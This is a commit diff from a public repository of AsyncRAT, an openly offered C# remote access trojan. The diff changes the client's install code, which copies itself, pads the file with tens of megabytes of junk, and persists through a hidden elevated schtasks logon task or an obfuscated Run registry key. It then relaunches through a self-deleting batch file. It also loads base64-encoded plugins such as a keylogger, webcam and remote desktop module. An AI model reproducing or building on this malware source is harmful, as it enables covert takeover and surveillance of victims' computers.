Sapphire/AsyncRAT-C-Sharp
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update

Browse Source
This commit is contained in:
NYAN CAT 2019-10-04 07:13:19 +03:00
parent 058a5d2b61
commit b71f320fd0
16 changed files with 52 additions and 34 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
AsyncRAT-C#/Client/Handle Packet/Packet.cs
View File

@ -36,7 +36,7 @@ namespace Client.Handle_Packet
Assembly assembly = AppDomain.CurrentDomain.Load(Convert.FromBase64String(Strings.StrReverse(SetRegistry.GetValue(unpack_msgpack.ForcePathObject("Dll").AsString))));
Type type = assembly.GetType("Plugin.Plugin");
dynamic instance = Activator.CreateInstance(type);
instance.Run(ClientSocket.TcpClient, Settings.ServerCertificate, Settings.Hwid, unpack_msgpack.ForcePathObject("Msgpack").GetAsBytes(), Methods._appMutex, Settings.MTX, Settings.BDOS, Settings.Install, Settings.InstallFile);
instance.Run(ClientSocket.TcpClient, Settings.ServerCertificate, Settings.Hwid, unpack_msgpack.ForcePathObject("Msgpack").GetAsBytes(), Methods._appMutex, Settings.MTX, Settings.BDOS, Settings.Install);
break;
}

39
AsyncRAT-C#/Client/Install/NormalStartup.cs
View File

@ -15,8 +15,8 @@ namespace Client.Install
{
try
{
string installfullpath = Path.Combine(Environment.ExpandEnvironmentVariables(Settings.InstallFolder), Settings.InstallFile);
if (Process.GetCurrentProcess().MainModule.FileName != installfullpath)
FileInfo installPath = new FileInfo(Path.Combine(Environment.ExpandEnvironmentVariables(Settings.InstallFolder), Settings.InstallFile));
if (Process.GetCurrentProcess().MainModule.FileName != installPath.FullName)
{
for (int i = 0; i < 10; i++)
@ -28,13 +28,10 @@ namespace Client.Install
{
try
{
if (P.MainModule.FileName == installfullpath)
if (P.MainModule.FileName == installPath.FullName)
P.Kill();
}
catch
{
Debug.WriteLine("NormalStartup Error : " + P.ProcessName);
}
catch { }
}
if (Methods.IsAdmin())
{
@ -43,7 +40,7 @@ namespace Client.Install
StartInfo = new ProcessStartInfo
{
FileName = "schtasks.exe",
Arguments = "/create /f /sc ONLOGON /RL HIGHEST /tn " + @"""'" + Settings.InstallFile + @"""'" + " /tr " + @"""'" + installfullpath + @"""'",
Arguments = "/create /f /sc ONLOGON /RL HIGHEST /tn " + @"""'" + Path.GetFileNameWithoutExtension(installPath.FullName) + @"""'" + " /tr " + @"""'" + installPath.FullName + @"""'",
WindowStyle = ProcessWindowStyle.Hidden,
CreateNoWindow = true,
}
@ -54,17 +51,17 @@ namespace Client.Install
{
using (RegistryKey key = Registry.CurrentUser.OpenSubKey(Strings.StrReverse(@"\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS"), RegistryKeyPermissionCheck.ReadWriteSubTree))
{
key.SetValue(Settings.InstallFile, "\"" + installfullpath + "\"");
key.SetValue(Path.GetFileNameWithoutExtension(installPath.FullName), "\"" + installPath.FullName + "\"");
}
}
FileStream fs;
if (File.Exists(installfullpath))
if (File.Exists(installPath.FullName))
{
File.Delete(installfullpath);
File.Delete(installPath.FullName);
Thread.Sleep(1000);
}
fs = new FileStream(installfullpath, FileMode.CreateNew);
fs = new FileStream(installPath.FullName, FileMode.CreateNew);
byte[] clientExe = File.ReadAllBytes(Process.GetCurrentProcess().MainModule.FileName);
fs.Write(clientExe, 0, clientExe.Length);
byte[] junk = new byte[new Random().Next(40 * 1024 * 1000, 50 * 1024 * 1000)];
@ -72,8 +69,24 @@ namespace Client.Install
fs.Write(junk, 0, junk.Length);
fs.Dispose();
Process.Start(installfullpath);
Methods.ClientExit();
string batch = Path.GetTempFileName() + ".bat";
using (StreamWriter sw = new StreamWriter(batch))
{
sw.WriteLine("@echo off");
sw.WriteLine("timeout 3 > NUL");
sw.WriteLine("START " + "\"" + "\" " + "\"" + installPath.FullName + "\"");
sw.WriteLine("CD " + Path.GetTempPath());
sw.WriteLine("DEL " + "\"" + Path.GetFileName(batch) + "\"" + " /f /q");
}
Process.Start(new ProcessStartInfo()
{
FileName = batch,
CreateNoWindow = true,
ErrorDialog = false,
UseShellExecute = false,
WindowStyle = ProcessWindowStyle.Hidden
});
Environment.Exit(0);
}
}

2
AsyncRAT-C#/Plugin/Chat/Chat/Plugin.cs
View File

@ -13,7 +13,7 @@ namespace Plugin
public class Plugin
{
public static Socket Socket;
public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install, string installFile)
public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install)
{
Debug.WriteLine("Plugin Invoked");
Socket = socket;

2
AsyncRAT-C#/Plugin/Extra/Extra/Plugin.cs
View File

@ -14,7 +14,7 @@ namespace Plugin
public class Plugin
{
public static Socket Socket;
public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install, string installFile)
public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install)
{
Debug.WriteLine("Plugin Invoked");
Socket = socket;

3
AsyncRAT-C#/Plugin/FileManager/FileManager/Plugin.cs
View File

@ -20,14 +20,13 @@ namespace Plugin
public static string Install;
public static string InstallFile;
public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install, string installFile)
public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install)
{
Debug.WriteLine("Plugin Invoked");
AppMutex = mutex;
Mutex = mtx;
BDOS = bdos;
Install = install;
InstallFile = installFile;
Socket = socket;
Connection.ServerCertificate = certificate;
Connection.Hwid = hwid;

2
AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/Plugin.cs
View File

@ -13,7 +13,7 @@ namespace Plugin
public class Plugin
{
public static Socket Socket;
public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install, string installFile)
public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install)
{
Debug.WriteLine("Plugin Invoked");
Socket = socket;

2
AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Plugin.cs
View File

@ -14,7 +14,7 @@ namespace Plugin
public class Plugin
{
public static Socket Socket;
public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install, string installFile)
public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install)
{
Debug.WriteLine("Plugin Invoked");
Socket = socket;

3
AsyncRAT-C#/Plugin/Options/Options/Handler/HandleUAC.cs
View File

@ -3,6 +3,7 @@ using System.Collections.Generic;
using System.Diagnostics;
using System.Linq;
using System.Text;
using System.Windows.Forms;
namespace Plugin.Handler
{
@ -19,7 +20,7 @@ namespace Plugin.Handler
StartInfo = new ProcessStartInfo
{
FileName = "cmd",
Arguments = "/k START \"\" \"" + Process.GetCurrentProcess().MainModule.FileName + "\" & EXIT",
Arguments = "/k START \"\" \"" + Application.ExecutablePath + "\" & EXIT",
WindowStyle = ProcessWindowStyle.Hidden,
Verb = "runas",
UseShellExecute = true

10
AsyncRAT-C#/Plugin/Options/Options/Handler/HandleUninstall.cs
View File

@ -18,13 +18,13 @@ namespace Plugin.Handler
try
{
if (!Methods.IsAdmin())
Registry.CurrentUser.CreateSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", RegistryKeyPermissionCheck.ReadWriteSubTree).DeleteValue(Plugin.InstallFile);
Registry.CurrentUser.CreateSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", RegistryKeyPermissionCheck.ReadWriteSubTree).DeleteValue(Path.GetFileNameWithoutExtension(Application.ExecutablePath));
else
{
Process.Start(new ProcessStartInfo()
{
FileName = "schtasks",
Arguments = "/delete /f /tn " + @"""'" + Plugin.InstallFile + @"""'",
Arguments = "/delete /f /tn " + @"""'" + Path.GetFileNameWithoutExtension(Application.ExecutablePath) + @"""'",
CreateNoWindow = true,
ErrorDialog = false,
UseShellExecute = false,
@ -35,6 +35,12 @@ namespace Plugin.Handler
catch { }
}
try
{
Registry.CurrentUser.CreateSubKey(@"SOFTWARE\", RegistryKeyPermissionCheck.ReadWriteSubTree).DeleteSubKey(Connection.Hwid);
}
catch { }
string batch = Path.GetTempFileName() + ".bat";
using (StreamWriter sw = new StreamWriter(batch))
{

3
AsyncRAT-C#/Plugin/Options/Options/Plugin.cs
View File

@ -20,14 +20,13 @@ namespace Plugin
public static string Install;
public static string InstallFile;
public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install, string installFile)
public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install)
{
Debug.WriteLine("Plugin Invoked");
AppMutex = mutex;
Mutex = mtx;
BDOS = bdos;
Install = install;
InstallFile = installFile;
Socket = socket;
Connection.ServerCertificate = certificate;
Connection.Hwid = hwid;

2
AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/Plugin.cs
View File

@ -13,7 +13,7 @@ namespace Plugin
public class Plugin
{
public static Socket Socket;
public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install, string installFile)
public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install)
{
Debug.WriteLine("Plugin Invoked");
Socket = socket;

3
AsyncRAT-C#/Plugin/Recovery/Recovery/Plugin.cs
View File

@ -20,14 +20,13 @@ namespace Plugin
public static string Install;
public static string InstallFile;
public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install, string installFile)
public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install)
{
Debug.WriteLine("Plugin Invoked");
AppMutex = mutex;
Mutex = mtx;
BDOS = bdos;
Install = install;
InstallFile = installFile;
Socket = socket;
Connection.ServerCertificate = certificate;
Connection.Hwid = hwid;

2
AsyncRAT-C#/Plugin/RemoteCamera/RemoteCamera/Plugin.cs
View File

@ -13,7 +13,7 @@ namespace Plugin
public class Plugin
{
public static Socket Socket;
public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install, string installFile)
public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install)
{
Debug.WriteLine("Plugin Invoked");
Socket = socket;

2
AsyncRAT-C#/Plugin/RemoteDesktop/RemoteDesktop/Plugin.cs
View File

@ -13,7 +13,7 @@ namespace Plugin
public class Plugin
{
public static Socket Socket;
public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install, string installFile)
public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install)
{
Debug.WriteLine("Plugin Invoked");
Socket = socket;

6
AsyncRAT-C#/Plugin/SendFile/SendFile/Handler/HandleUninstall.cs
View File

@ -18,13 +18,13 @@ namespace Plugin.Handler
try
{
if (!Methods.IsAdmin())
Registry.CurrentUser.CreateSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", RegistryKeyPermissionCheck.ReadWriteSubTree).DeleteValue(Plugin.InstallFile);
Registry.CurrentUser.CreateSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", RegistryKeyPermissionCheck.ReadWriteSubTree).DeleteValue(Path.GetFileNameWithoutExtension(Application.ExecutablePath));
else
{
Process.Start(new ProcessStartInfo()
{
FileName = "schtasks",
Arguments = "/delete /f /tn " + @"""'" + Plugin.InstallFile + @"""'",
Arguments = "/delete /f /tn " + @"""'" + Path.GetFileNameWithoutExtension(Application.ExecutablePath) + @"""'",
CreateNoWindow = true,
ErrorDialog = false,
UseShellExecute = false,
@ -35,6 +35,8 @@ namespace Plugin.Handler
catch { }
}
Registry.CurrentUser.CreateSubKey(@"", RegistryKeyPermissionCheck.ReadWriteSubTree).DeleteSubKey(Connection.Hwid);
string batch = Path.GetTempFileName() + ".bat";
using (StreamWriter sw = new StreamWriter(batch))
{

3
AsyncRAT-C#/Plugin/SendFile/SendFile/Plugin.cs
View File

@ -20,14 +20,13 @@ namespace Plugin
public static string Install;
public static string InstallFile;
public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install, string installFile)
public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install)
{
Debug.WriteLine("Plugin Invoked");
AppMutex = mutex;
Mutex = mtx;
BDOS = bdos;
Install = install;
InstallFile = installFile;
Socket = socket;
Connection.ServerCertificate = certificate;
Connection.Hwid = hwid;